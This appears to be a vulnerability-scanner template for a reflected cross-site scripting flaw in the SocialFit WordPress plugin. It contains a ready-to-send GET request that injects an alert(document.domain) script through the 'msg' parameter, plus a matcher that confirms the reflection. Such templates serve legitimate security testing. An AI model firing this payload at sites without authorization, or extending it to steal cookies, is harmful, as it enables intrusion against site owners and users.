id: wp-socialfit-xss
info:
  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
  author:
  - l0ne1y
  description: |+
    WordPress Plugin SocialFit cross-site scripting vulnerability
    WordPress is a blogging platform developed by the WordPress Software Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.

    A cross-site scripting vulnerability exists in the SocialFit plugin in WordPress, which results from unvalidated user-supplied input. An attacker could exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of an affected site, steal cookie-based authentication credentials, and launch other attacks. A vulnerability exists in SocialFit version 1.2.2 and other versions may also be affected.

  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: dsl
    dsl:
    - contains(body,"</script><script>alert(document.domain)</script>") && !contains(body,"/wp-content/plugins/socialfit/popup.php")
      && status_code==200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
  method: GET
  req-condition: true
